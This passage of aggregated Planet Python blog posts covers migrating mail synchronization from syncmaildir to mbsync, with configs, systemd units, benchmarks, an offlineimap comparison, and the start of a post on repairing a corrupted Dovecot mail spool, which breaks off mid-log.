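    for key, done, total in re.findall(r'([CB]): (\d+)/(\d+)', line):
        out[key] = (int(done), int(total))
    # far (F) and near (N) sides: "+new/total *flags/total #trash/total"
    for side, a, b, c, d, e, f in re.findall(
            r'([FN]): \+(\d+)/(\d+) \*(\d+)/(\d+) #(\d+)/(\d+)', line):
        out[side] = {'new': (int(a), int(b)),
                     'flags': (int(c), int(d)),
                     'trash': (int(e), int(f))}
    return out

p = parse_progress("C: 1/2 B: 204/205 F: +0/0 *0/0 #0/0 N: +1/200 *0/0 #0/0")
print(p['N'])  # {'new': (1, 200), 'flags': (0, 0), 'trash': (0, 0)}
```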

Interoperability issue

In my notmuch setup, I have bound key S to "mark spam", which basically assigns the tag spam to the message and removes a bunch of others. Then I have a notmuch-purge script which moves that message to the spam folder, for training purposes. It basically does this:

notmuch search --output=files --format=text0 "$search_spam" \
    | xargs -r -0 mv -t "$HOME/Maildir/${PREFIX}junk/cur/"

This method, which worked fine in SMD (and also OfflineIMAP), created this error on sync:

Maildir error: duplicate UID 37578.

And indeed, there are now two messages with that UID in the mailbox:

anarcat@angela:~(main)$ find Maildir/.junk/ -name '*U=37578*'
Maildir/.junk/cur/1637427889.134334_2.angela,U=37578:2,S
Maildir/.junk/cur/1637348602.2492889_221804.angela,U=37578:2,S

This is actually a known limitation or, as mbsync(1) calls it, a "RECOMMENDATION":

When using the more efficient default UID mapping scheme, it is important that the MUA renames files when moving them between Maildir folders. Mutt always does that, while mu4e needs to be configured to do it:

(setq mu4e-change-filenames-when-moving t)

So it seems I would need to fix my script. Unfortunately, the manpage doesn't say how the paths should be renamed, so I can't tell how to adapt my script to mbsync just from reading the above.

Fortunately, someone else already fixed that issue: afew, a notmuch tagging script (much puns, such hurt), has a move mode that can rename files correctly, specifically designed to deal with mbsync. I had already been told about afew, but it's one more reason to standardize my notmuch hooks on that project, it looks like.

(A manual fix is actually to rename the file to remove the U= field: mbsync will generate a new one and then sync correctly.)
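As an illustration of that manual fix, here is a hedged Python sketch of the renaming; the filename format is an assumption based on the examples above, so test on a copy of your maildir first:

```python
# Hypothetical helper (not part of mbsync): strip the ",U=<uid>" marker from a
# maildir file name so that mbsync assigns a fresh UID on the next sync.
import re

def strip_uid(name: str) -> str:
    """Remove a ',U=NNNN' attribute from a maildir file name, if present."""
    return re.sub(r',U=\d+(?=[:,]|$)', '', name)

print(strip_uid("1637427889.134334_2.angela,U=37578:2,S"))
# -> 1637427889.134334_2.angela:2,S
```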

Stability issues

The newer release in Debian bookworm (currently at 1.4.3) has stability issues on full sync. I filed bug 999804 in Debian about this, which led to a thread on the upstream mailing list. I have found at least three distinct crashes that could be double-free bugs "which might be exploitable in the worst case", not a reassuring prospect.

The thing is: mbsync is really fast, but the downside of that is that it's written in C, and with that comes a whole set of security issues. The Debian security tracker has only three CVEs on isync, but the above issues show there could be many more.

Reading the source code certainly did not make me very comfortable with trusting it with untrusted data. I considered sandboxing it with systemd (below) but having systemd run as a --user process makes that difficult. I also considered using an apparmor profile but that is not trivial because we need to allow SSH and only some parts of it...

Thankfully, upstream has been diligent at addressing the issues I have found. They provided a patch within a few days which did fix the sync issues.

Automation with systemd

The Arch wiki has instructions on how to setup mbsync as a systemd service. It suggests using the --verbose (-V) flag which is a little intense here, as it outputs 1444 lines of messages.

I have used the following .service file:

[Unit]
Description=Mailbox synchronization service
ConditionHost=!marcos
Wants=network-online.target
After=network-online.target
Before=notmuch-new.service

[Service]
Type=oneshot
ExecStart=/usr/bin/mbsync -a
Nice=10
IOSchedulingClass=idle
NoNewPrivileges=true

[Install]
WantedBy=default.target

And the following .timer:

[Unit]
Description=Mailbox synchronization timer
ConditionHost=!marcos

[Timer]
OnBootSec=2m
OnUnitActiveSec=5m
Unit=mbsync.service

[Install]
WantedBy=timers.target

Note that we trigger notmuch through systemd, with the Before and also by adding mbsync.service to the notmuch-new.service file:

[Unit]
Description=notmuch new
After=mbsync.service

[Service]
Type=oneshot
Nice=10
ExecStart=/usr/bin/notmuch new

[Install]
WantedBy=mbsync.service

An improvement over polling repeatedly with a .timer would be to wake up only on IMAP notify, but neither imapnotify nor goimapnotify seem to be packaged in Debian. It would also not cover the "sent folder" use case, where we need to wake up on local changes.

Password-less setup

The sample file suggests this should work:

IMAPStore remote
Tunnel "ssh -q host.remote.com /usr/sbin/imapd"

Add BatchMode, restrict to IdentitiesOnly, provide a password-less key just for this, add compression (-C), find the Dovecot imap binary, and you get this:

IMAPAccount anarcat-tunnel
Tunnel "ssh -o BatchMode=yes -o IdentitiesOnly=yes -i ~/.ssh/id_ed25519_mbsync -o HostKeyAlias=shell.anarc.at -C anarcat@imap.anarc.at /usr/lib/dovecot/imap"

And it actually seems to work:

$ mbsync -a
Notice: Master/Slave are deprecated; use Far/Near instead.
C: 0/2 B: 0/1 F: +0/0 *0/0 #0/0 N: +0/0 *0/0 #0/0imap(anarcat): Error: net_connect_unix(/run/dovecot/stats-writer) failed: Permission denied
C: 2/2 B: 205/205 F: +0/0 *0/0 #0/0 N: +1/1 *3/3 #0/0imap(anarcat)<1611280><90uUOuyElmEQlhgAFjQyWQ>: Info: Logged out in=10808 out=15396642 deleted=0 expunged=0 trashed=0 hdr_count=0 hdr_bytes=0 body_count=1 body_bytes=8087

It's a bit noisy, however. dovecot/imap doesn't have a "usage" to speak of, but even the source code doesn't hint at a way to disable that Error message, so that's unfortunate. That socket is owned by root:dovecot so presumably Dovecot runs the imap process as $user:dovecot, which we can't do here. Oh well?

Interestingly, the SSH setup is not faster than IMAP.

With IMAP:

===> multitime results
1: mbsync -a
        Mean        Std.Dev.    Min         Median      Max
real    2.367       0.065       2.220      2.376       2.458
user    0.793       0.047       0.731      0.776       0.871
sys     0.426       0.040       0.364      0.434       0.476

With SSH:

===> multitime results
1: mbsync -a
        Mean        Std.Dev.    Min         Median      Max
real    2.515       0.088       2.274      2.532       2.594
user    0.753       0.043       0.645      0.766       0.804
sys     0.328       0.045       0.212      0.340       0.393

Basically: 200ms slower. Tolerable.

Migrating from SMD

The above was how I migrated to mbsync on my first workstation. The work on the second one was more streamlined, especially since the corruption on mailboxes was fixed:

  1. install isync, with the patch:

    dpkg -i isync_1.4.3-1.1~_amd64.deb
  2. copy all files over from previous workstation to avoid a full resync (optional):

    rsync -a --info=progress2 angela:Maildir/ Maildir-mbsync/
  3. rename all files to match new hostname (optional):

    find Maildir-mbsync/ -type f -name '*.angela,*' -print0 | rename -0 's/\.angela,/\.curie,/'
  4. trash the notmuch database (optional):

    rm -rf Maildir-mbsync/.notmuch/xapian/
  5. disable all smd and notmuch services:

    systemctl --user --now disable smd-pull.service smd-pull.timer smd-push.service smd-push.timer notmuch-new.service notmuch-new.timer
  6. do one last sync with smd:

    smd-pull --show-tags ; smd-push --show-tags ; notmuch new ; notmuch-sync-flagged -v
  7. backup notmuch on the client and server:

    notmuch dump | pv > notmuch.dump
  8. backup the maildir on the client and server:

    cp -al Maildir Maildir-bak
  9. create the SSH key:

    ssh-keygen -t ed25519 -f .ssh/id_ed25519_mbsync
    cat .ssh/id_ed25519_mbsync.pub
  10. add to .ssh/authorized_keys on the server, like this:

    command="/usr/lib/dovecot/imap",restrict ssh-ed25519 AAAAC...

  11. move old files aside, if present:

    mv Maildir Maildir-smd
  12. move new files in place (CRITICAL SECTION BEGINS!):

    mv Maildir-mbsync Maildir
  13. run a test sync, only pulling changes:

    mbsync --create-near --remove-none --expunge-none --noop anarcat-register

  14. if that works well, try with all mailboxes:

    mbsync --create-near --remove-none --expunge-none --noop -a

  15. if that works well, try again with a full sync:

    mbsync register
    mbsync -a

  16. reindex and restore the notmuch database, this should take ~25 minutes:

    notmuch new
    pv notmuch.dump | notmuch restore
  17. enable the systemd services and retire the smd-* services:

    systemctl --user enable mbsync.timer notmuch-new.service
    systemctl --user start mbsync.timer
    rm ~/.config/systemd/user/smd*
    systemctl daemon-reload

During the migration, notmuch helpfully told me the full list of those lost messages:

[...]
Warning: cannot apply tags to missing message: CAN6gO7_QgCaiDFvpG3AXHi6fW12qaN286+2a7ERQ2CQtzjSEPw@mail.gmail.com
Warning: cannot apply tags to missing message: CAPTU9Wmp0yAmaxO+qo8CegzRQZhCP853TWQ_Ne-YF94MDUZ+Dw@mail.gmail.com
Warning: cannot apply tags to missing message: F5086003-2917-4659-B7D2-66C62FCD4128@gmail.com
[...]
Warning: cannot apply tags to missing message: mailman.2.1316793601.53477.sage-members@mailman.sage.org
Warning: cannot apply tags to missing message: mailman.7.1317646801.26891.outages-discussion@outages.org
Warning: cannot apply tags to missing message: notmuch-sha1-000458df6e48d4857187a000d643ac971deeef47
Warning: cannot apply tags to missing message: notmuch-sha1-0079d8e0c3340e6f88c66f4c49fca758ea71d06d
Warning: cannot apply tags to missing message: notmuch-sha1-0194baa4cfb6d39bc9e4d8c049adaccaa777467d
Warning: cannot apply tags to missing message: notmuch-sha1-02aede494fc3f9e9f060cfd7c044d6d724ad287c
Warning: cannot apply tags to missing message: notmuch-sha1-06606c625d3b3445420e737afd9a245ae66e5562
Warning: cannot apply tags to missing message: notmuch-sha1-0747b020f7551415b9bf5059c58e0a637ba53b13
[...]

As detailed in the crash report, all of those were actually innocuous and could be ignored.

Also note that we completely trash the notmuch database because it's actually faster to reindex from scratch than to let notmuch slowly figure out that all mails are new and all the old mails are gone. The fresh indexing took:

nov 19 15:08:54 angela notmuch[2521117]: Processed 384679 total files in 23m 41s (270 files/sec.).
nov 19 15:08:54 angela notmuch[2521117]: Added 372610 new messages to the database.

A reindexing on top of an existing database, by contrast, went twice as slow, at about 120 files/sec.
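As a quick sanity check on the numbers in that log:

```python
# Verify the indexing rate quoted in the notmuch log above.
files = 384679
seconds = 23 * 60 + 41   # 23m 41s
print(round(files / seconds))  # about 271 files/sec, matching the logged 270 files/sec
```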

Current config file

Putting it all together, I ended up with the following configuration file:

SyncState *
Sync All

# IMAP side, AKA "Far"
IMAPAccount anarcat-imap
Host imap.anarc.at
User anarcat
PassCmd "pass imap.anarc.at"
SSLType IMAPS
CertificateFile /etc/ssl/certs/ca-certificates.crt

IMAPAccount anarcat-tunnel
Tunnel "ssh -o BatchMode=yes -o IdentitiesOnly=yes -i ~/.ssh/id_ed25519_mbsync -o HostKeyAlias=shell.anarc.at -C anarcat@imap.anarc.at /usr/lib/dovecot/imap"

IMAPStore anarcat-remote
Account anarcat-tunnel

# Maildir side, AKA "Near"
MaildirStore anarcat-local
# Maildir/top/sub/sub
#SubFolders Verbatim
# Maildir/.top.sub.sub
SubFolders Maildir++
# Maildir/top/.sub/.sub
# SubFolders legacy
# The trailing "/" is important
#Path ~/Maildir-mbsync/
Inbox ~/Maildir/

# what binds Maildir and IMAP
Channel anarcat
Far :anarcat-remote:
Near :anarcat-local:
# Exclude everything under the internal [Gmail] folder, except the interesting folders
#Patterns * ![Gmail]* "[Gmail]/Sent Mail" "[Gmail]/Starred" "[Gmail]/All Mail"
# Or include everything
#Patterns *
Patterns * !register !.register
# Automatically create missing mailboxes, both locally and on the server
Create Both
#Create Near
# Sync the movement of messages between folders and deletions, add after making sure the sync works
Expunge Both
# Propagate mailbox deletion
Remove both

IMAPAccount anarcat-register-imap
Host imap.anarc.at
User register
PassCmd "pass imap.anarc.at-register"
SSLType IMAPS
CertificateFile /etc/ssl/certs/ca-certificates.crt

IMAPAccount anarcat-register-tunnel
Tunnel "ssh -o BatchMode=yes -o IdentitiesOnly=yes -i ~/.ssh/id_ed25519_mbsync -o HostKeyAlias=shell.anarc.at -C register@imap.anarc.at /usr/lib/dovecot/imap"

IMAPStore anarcat-register-remote
Account anarcat-register-tunnel

MaildirStore anarcat-register-local
SubFolders Maildir++
Inbox ~/Maildir/.register/

Channel anarcat-register
Far :anarcat-register-remote:
Near :anarcat-register-local:
Create Both
Expunge Both
Remove both

Note that it may be out of sync with my live (and private) configuration file, as I do not publish my "dotfiles" repository publicly for security reasons.

OfflineIMAP

I've used OfflineIMAP for a long time before switching to SMD. I don't exactly remember why or when I started using it, but I do remember it became painfully slow as I started using notmuch, and would sometimes crash mysteriously. It's been a while, so my memory is hazy on that.

It also kind of died in a fire when Python 2 stopped being maintained. The main author moved on to a different project, imapfw, which could serve as a framework to build IMAP clients, but never seemed to implement all of the OfflineIMAP features and certainly not configuration file compatibility. Thankfully, a new team of volunteers ported OfflineIMAP to Python 3 and we can now test that new version to see if it is an improvement over mbsync.

Crash on full sync

The first thing that happened on a full sync is this crash:

Copy message from RemoteAnarcat:junk: ERROR: Copying message 30624 [acc: Anarcat] decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode') Thread 'Copy message from RemoteAnarcat:junk' terminated with exception: Traceback (most recent call last): File "/usr/share/offlineimap3/offlineimap/imaputil.py", line 406, in utf7m_decode for c in binary.decode(): AttributeError: 'memoryview' object has no attribute 'decode' The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/usr/share/offlineimap3/offlineimap/threadutil.py", line 146, in run Thread.run(self) File "/usr/lib/python3.9/threading.py", line 892, in run self._target(*self._args, **self._kwargs) File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 802, in copymessageto message = self.getmessage(uid) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 342, in getmessage data = self._fetch_from_imap(str(uid), self.retrycount) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 908, in _fetch_from_imap ndata1 = self.parser['8bit-RFC'].parsebytes(data[0][1]) File "/usr/lib/python3.9/email/parser.py", line 123, in parsebytes return self.parser.parsestr(text, headersonly) File "/usr/lib/python3.9/email/parser.py", line 67, in parsestr return self.parse(StringIO(text), headersonly=headersonly) File "/usr/lib/python3.9/email/parser.py", line 56, in parse feedparser.feed(data) File "/usr/lib/python3.9/email/feedparser.py", line 176, in feed self._call_parse() File "/usr/lib/python3.9/email/feedparser.py", line 180, in _call_parse self._parse() File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen for retval in self._parsegen(): File "/usr/lib/python3.9/email/feedparser.py", line 298, in _parsegen for retval in self._parsegen(): File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen for retval in self._parsegen(): File 
"/usr/lib/python3.9/email/feedparser.py", line 256, in _parsegen if self._cur.get_content_type() == 'message/delivery-status': File "/usr/lib/python3.9/email/message.py", line 578, in get_content_type value = self.get('content-type', missing) File "/usr/lib/python3.9/email/message.py", line 471, in get return self.policy.header_fetch_parse(k, v) File "/usr/lib/python3.9/email/policy.py", line 163, in header_fetch_parse return self.header_factory(name, value) File "/usr/lib/python3.9/email/headerregistry.py", line 601, in __call__ return self[name](name, value) File "/usr/lib/python3.9/email/headerregistry.py", line 196, in __new__ cls.parse(value, kwds) File "/usr/lib/python3.9/email/headerregistry.py", line 445, in parse kwds['parse_tree'] = parse_tree = cls.value_parser(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 2675, in parse_content_type_header ctype.append(parse_mime_parameters(value[1:])) File "/usr/lib/python3.9/email/_header_value_parser.py", line 2569, in parse_mime_parameters token, value = get_parameter(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 2492, in get_parameter token, value = get_value(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 2403, in get_value token, value = get_quoted_string(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 1294, in get_quoted_string token, value = get_bare_quoted_string(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 1223, in get_bare_quoted_string token, value = get_encoded_word(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 1064, in get_encoded_word text, charset, lang, defects = _ew.decode('=?' 
+ tok + '?=') File "/usr/lib/python3.9/email/_encoded_words.py", line 181, in decode string = bstring.decode(charset) AttributeError: decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode') Last 1 debug messages logged for Copy message from RemoteAnarcat:junk prior to exception: thread: Register new thread 'Copy message from RemoteAnarcat:junk' (account 'Anarcat') ERROR: Exceptions occurred during the run! ERROR: Copying message 30624 [acc: Anarcat] decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode') Traceback: File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 802, in copymessageto message = self.getmessage(uid) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 342, in getmessage data = self._fetch_from_imap(str(uid), self.retrycount) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 908, in _fetch_from_imap ndata1 = self.parser['8bit-RFC'].parsebytes(data[0][1]) File "/usr/lib/python3.9/email/parser.py", line 123, in parsebytes return self.parser.parsestr(text, headersonly) File "/usr/lib/python3.9/email/parser.py", line 67, in parsestr return self.parse(StringIO(text), headersonly=headersonly) File "/usr/lib/python3.9/email/parser.py", line 56, in parse feedparser.feed(data) File "/usr/lib/python3.9/email/feedparser.py", line 176, in feed self._call_parse() File "/usr/lib/python3.9/email/feedparser.py", line 180, in _call_parse self._parse() File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen for retval in self._parsegen(): File "/usr/lib/python3.9/email/feedparser.py", line 298, in _parsegen for retval in self._parsegen(): File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen for retval in self._parsegen(): File "/usr/lib/python3.9/email/feedparser.py", line 256, in _parsegen if self._cur.get_content_type() == 'message/delivery-status': File "/usr/lib/python3.9/email/message.py", line 578, in 
get_content_type value = self.get('content-type', missing) File "/usr/lib/python3.9/email/message.py", line 471, in get return self.policy.header_fetch_parse(k, v) File "/usr/lib/python3.9/email/policy.py", line 163, in header_fetch_parse return self.header_factory(name, value) File "/usr/lib/python3.9/email/headerregistry.py", line 601, in __call__ return self[name](name, value) File "/usr/lib/python3.9/email/headerregistry.py", line 196, in __new__ cls.parse(value, kwds) File "/usr/lib/python3.9/email/headerregistry.py", line 445, in parse kwds['parse_tree'] = parse_tree = cls.value_parser(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 2675, in parse_content_type_header ctype.append(parse_mime_parameters(value[1:])) File "/usr/lib/python3.9/email/_header_value_parser.py", line 2569, in parse_mime_parameters token, value = get_parameter(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 2492, in get_parameter token, value = get_value(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 2403, in get_value token, value = get_quoted_string(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 1294, in get_quoted_string token, value = get_bare_quoted_string(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 1223, in get_bare_quoted_string token, value = get_encoded_word(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 1064, in get_encoded_word text, charset, lang, defects = _ew.decode('=?' + tok + '?=') File "/usr/lib/python3.9/email/_encoded_words.py", line 181, in decode string = bstring.decode(charset) Folder junk [acc: Anarcat]: Copy message UID 30626 (29008/49310) RemoteAnarcat:junk -> LocalAnarcat:junk Command exited with non-zero status 100 5252.91user 535.86system 3:21:00elapsed 47%CPU (0avgtext+0avgdata 846304maxresident)k 96344inputs+26563792outputs (1189major+2155815minor)pagefaults 0swaps

That only transferred about 8GB of mail, which gives us a transfer rate of 5.3Mbit/s, more than 5 times slower than mbsync. This bug is possibly limited to the bullseye version of offlineimap3 (the lovely 0.0~git20210225.1e7ef9e+dfsg-4), while the current sid version (the equally gorgeous 0.0~git20211018.e64c254+dfsg-1) seems unaffected.

Tolerable performance

The new release still crashes, except it does so at the very end, which is an improvement, since the mails do get transferred:

*** Finished account 'Anarcat' in 511:12 ERROR: Exceptions occurred during the run! ERROR: Exception parsing message with ID (<20190619152034.BFB8810E07A@marcos.anarc.at>) from imaplib (response type: bytes). AttributeError: decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode') Traceback: File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 810, in copymessageto message = self.getmessage(uid) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 343, in getmessage data = self._fetch_from_imap(str(uid), self.retrycount) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 910, in _fetch_from_imap raise OfflineImapError( ERROR: Exception parsing message with ID (<40A270DB.9090609@alternatives.ca>) from imaplib (response type: bytes). AttributeError: decoding with 'x-mac-roman' codec failed (AttributeError: 'memoryview' object has no attribute 'decode') Traceback: File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 810, in copymessageto message = self.getmessage(uid) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 343, in getmessage data = self._fetch_from_imap(str(uid), self.retrycount) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 910, in _fetch_from_imap raise OfflineImapError( ERROR: IMAP server 'RemoteAnarcat' does not have a message with UID '32686' Traceback: File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 810, in copymessageto message = self.getmessage(uid) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 343, in getmessage data = self._fetch_from_imap(str(uid), self.retrycount) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 889, in _fetch_from_imap raise OfflineImapError(reason, severity) Command exited with non-zero status 1 8273.52user 983.80system 8:31:12elapsed 30%CPU (0avgtext+0avgdata 841936maxresident)k 56376inputs+43247608outputs (811major+4972914minor)pagefaults 0swaps 
"offlineimap -o " took 8 hours 31 mins 15 secs

This is 8h31m for transferring 12G, which is around 3.1Mbit/s. That is nine times slower than mbsync, almost an order of magnitude!

Now that we have a full sync, we can test incremental synchronization. That is also much slower:

===> multitime results
1: sh -c "offlineimap -o || true"
        Mean        Std.Dev.    Min         Median      Max
real    24.639      0.513       23.946     24.526      25.708
user    23.912      0.473       23.404     23.795      24.947
sys     1.743       0.105       1.607      1.729       2.002

That is also an order of magnitude slower than mbsync, and significantly slower than what you'd expect from a sync process. ~30 seconds is long enough to make me impatient and distracted; 3 seconds, less so: I can wait and see the results almost immediately.

Integrity check

That said: this is still on a gigabit link. It's technically possible that OfflineIMAP performs better than mbsync over a slow link, but I haven't tested that theory.

The OfflineIMAP mail spool is missing quite a few messages as well:

anarcat@angela:~(main)$ find Maildir-offlineimap -type f -type f -a \! -name '.*' | wc -l
381463
anarcat@angela:~(main)$ find Maildir -type f -type f -a \! -name '.*' | wc -l
385247

... although that's probably all either new messages or the register folder, so OfflineIMAP might actually be in a better position there. But digging in more, it seems like the actual per-folder diff is fairly similar to mbsync: a few messages missing here and there. Considering OfflineIMAP's instability and poor performance, I have not looked any deeper in those discrepancies.
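The per-folder diff hinted at above can be sketched with a short Python helper; the maildir layout (".folder/{cur,new,tmp}/message") and spool paths are assumptions matching the examples in this post:

```python
# Hedged sketch: compare per-folder message counts between two maildir spools.
from collections import Counter
from pathlib import Path

def folder_counts(paths):
    """Tally message files per maildir folder, from paths relative to the spool root."""
    counts = Counter()
    for p in paths:
        parts = Path(p).parts
        # expect folder/cur-or-new/filename; skip dotfiles like .uidvalidity
        if len(parts) >= 3 and not parts[-1].startswith('.'):
            counts[parts[0]] += 1
    return counts

def spool_diff(root_a, root_b):
    """Print folders whose message counts differ between two spools."""
    a = folder_counts(p.relative_to(root_a) for p in Path(root_a).rglob('*') if p.is_file())
    b = folder_counts(p.relative_to(root_b) for p in Path(root_b).rglob('*') if p.is_file())
    for folder in sorted(set(a) | set(b)):
        if a[folder] != b[folder]:
            print(f"{folder}: {a[folder]} vs {b[folder]}")

# e.g.: spool_diff(Path.home() / "Maildir", Path.home() / "Maildir-offlineimap")
print(folder_counts([".junk/cur/msg1", ".junk/cur/msg2", ".Sent/new/msg3"]))
```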

Other projects to evaluate

Those are all the options I have considered, in alphabetical order:

  • doveadm-sync: requires dovecot on both ends, can tunnel over SSH, may have performance issues in incremental sync
  • fdm: fetchmail replacement, IMAP/POP3/stdin/Maildir/mbox/NNTP support, SOCKS support (for Tor), complex rules for delivering to specific mailboxes, adding headers, piping to commands, etc.; discarded because it has no (real) support for keeping mail on the server, and is written in C
  • getmail: fetchmail replacement, IMAP/POP3 support, supports incremental runs, classification rules, Python
  • interimap: syncs two IMAP servers, apparently faster than doveadm and offlineimap, but requires running an IMAP server locally
  • isync/mbsync: TLS client certs and SSH tunnels, fast, incremental, IMAP/POP/Maildir support, multiple mailbox, trash and recursion support, and generally has good words from multiple Debian and notmuch people (Arch tutorial), written in C, review above
  • mail-sync: notify support, happens over any piped transport (e.g. ssh), diff/patch system, requires binary on both ends, mentions UUCP in the manpage, mentions rsmtp which is a nice name for rsendmail. not evaluated because it seems awfully complex to setup
  • nncp: treat the local spool as another mail server, not really compatible with my "multiple clients" setup
  • offlineimap3: requires IMAP, used the py2 version in the past, might just still work, first sync painful (IIRC), ways to tunnel over SSH, review above

Most projects were not evaluated due to lack of time.

Conclusion

I'm now using mbsync to sync my mail. I'm a little disappointed by the synchronisation times over the slow link, but I guess that's par for the course if we use IMAP. We are bound by the network speed much more than with custom protocols. I'm also worried about the C implementation and the crashes I have witnessed, but I am encouraged by the fast upstream response.

Time will tell if I will stick with that setup. I'm certainly curious about the promises of interimap and mail-sync, but I have run out of time on this project.

Categories: FLOSS Project Planets

Anarcat: The last syncmaildir crash

Planet Python - Sun, 2021-11-21 11:04

My syncmaildir (SMD) setup failed me one too many times (previously, previously). In an attempt to migrate to an alternative mail synchronization tool, I looked into using my IMAP server again, and found out my mail spool was in a pretty bad shape. I'm comparing mbsync and offlineimap in the next post but this post talks about how I recovered the mail spool so that tools like those could correctly synchronise the mail spool again.

The latest crash

On Monday, SMD just started failing with this error:

nov 15 16:12:19 angela systemd[2305]: Starting pull emails with syncmaildir...
nov 15 16:12:22 angela systemd[2305]: smd-pull.service: Succeeded.
nov 15 16:12:22 angela systemd[2305]: Finished pull emails with syncmaildir.
nov 15 16:14:08 angela systemd[2305]: Starting pull emails with syncmaildir...
nov 15 16:14:11 angela systemd[2305]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
nov 15 16:14:11 angela systemd[2305]: smd-pull.service: Failed with result 'exit-code'.
nov 15 16:14:11 angela systemd[2305]: Failed to start pull emails with syncmaildir.
nov 15 16:16:14 angela systemd[2305]: Starting pull emails with syncmaildir...
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Network error.
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Unable to get any data from the other endpoint.
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: This problem may be transient, please retry.
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Hint: did you correctly setup the SERVERNAME variable
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: on your client? Did you add an entry for it in your ssh
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: configuration file?
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Network error
nov 15 16:16:17 angela smd-pull[27188]: register: smd-client@localhost: TAGS: error::context(handshake) probable-cause(network) human-intervention(avoidable) suggested-actions(retry)
nov 15 16:16:17 angela systemd[2305]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
nov 15 16:16:17 angela systemd[2305]: smd-pull.service: Failed with result 'exit-code'.
nov 15 16:16:17 angela systemd[2305]: Failed to start pull emails with syncmaildir.

What is frustrating is that there's actually no network error here. Running the command by hand I did see a different message, but now I have lost it in my backlog. It had something to do with a filename being too long, and I gave up debugging after a while. This happened suddenly too, which added to the confusion.

In a fit of rage I started this blog post and experimenting with alternatives, which led me down a lot of rabbit holes.

Reviewing my previous mail crash documentation, it seems most solutions involve talking to an IMAP server, so I figured I would just do that. Wanting to try something new, i gave isync (AKA mbsync) a try. Oh dear, I did not expect how much trouble just talking to my IMAP server would be, which wasn't not isync's fault, for what that's worth. It was the primary tool I used to debug things, and served me well in that regard.

Mailbox corruption

The first thing I found out is that certain messages in the IMAP spool were corrupted. mbsync would stop on a FETCH command and Dovecot would give me those errors on the server side.

"wrong W value" nov 16 15:31:27 marcos dovecot[3621800]: imap(anarcat)<3630489><wAmSzO3QZtfAqAB1>: Error: Mailbox junk: Maildir filename has wrong W value, renamed the file from /home/anarcat/Maildir/.junk/cur/1454623938.M101164P22216.marcos,S=2495,W=2578:2,S to /home/anarcat/Maildir/.junk/cur/1454623938.M101164P22216.marcos,S=2495:2,S nov 16 15:31:27 marcos dovecot[3621800]: imap(anarcat)<3630489><wAmSzO3QZtfAqAB1>: Error: Mailbox junk: Deleting corrupted cache record uid=1582: UID 1582: Broken virtual size in mailbox junk: read(/home/anarcat/Maildir/.junk/cur/1454623938.M101164P22216.marcos,S=2495,W=2578:2,S): FETCH BODY[] got too little data: 2540 vs 2578

At least this first error was automatically healed by Dovecot (by renaming the file without the W= flag). The problem is that the FETCH command fails and mbsync exits noisily. So you need to constantly restart mbsync with a silly command like:

while ! mbsync -a; do sleep 1; done "cached message size larger than expected" nov 16 13:53:08 marcos dovecot[3520770]: imap(anarcat)<3594402><M5JHb+zQ3NLAqAB1>: Error: Mailbox Sent: UID=19288: read(/home/anarcat/Maildir/.Sent/cur/1224790447.M898726P9811V000000000000FE06I00794FB1_0.marvin,S=2588:2,S) failed: Cached message size larger than expected (2588 > 2482, box=Sent, UID=19288) (read reason=mail stream) nov 16 13:53:08 marcos dovecot[3520770]: imap(anarcat)<3594402><M5JHb+zQ3NLAqAB1>: Error: Mailbox Sent: Deleting corrupted cache record uid=19288: UID 19288: Broken physical size in mailbox Sent: read(/home/anarcat/Maildir/.Sent/cur/1224790447.M898726P9811V000000000000FE06I00794FB1_0.marvin,S=2588:2,S) failed: Cached message size larger than expected (2588 > 2482, box=Sent, UID=19288) nov 16 13:53:08 marcos dovecot[3520770]: imap(anarcat)<3594402><M5JHb+zQ3NLAqAB1>: Error: Mailbox Sent: UID=19288: read(/home/anarcat/Maildir/.Sent/cur/1224790447.M898726P9811V000000000000FE06I00794FB1_0.marvin,S=2588:2,S) failed: Cached message size larger than expected (2588 > 2482, box=Sent, UID=19288) (read reason=) nov 16 13:53:08 marcos 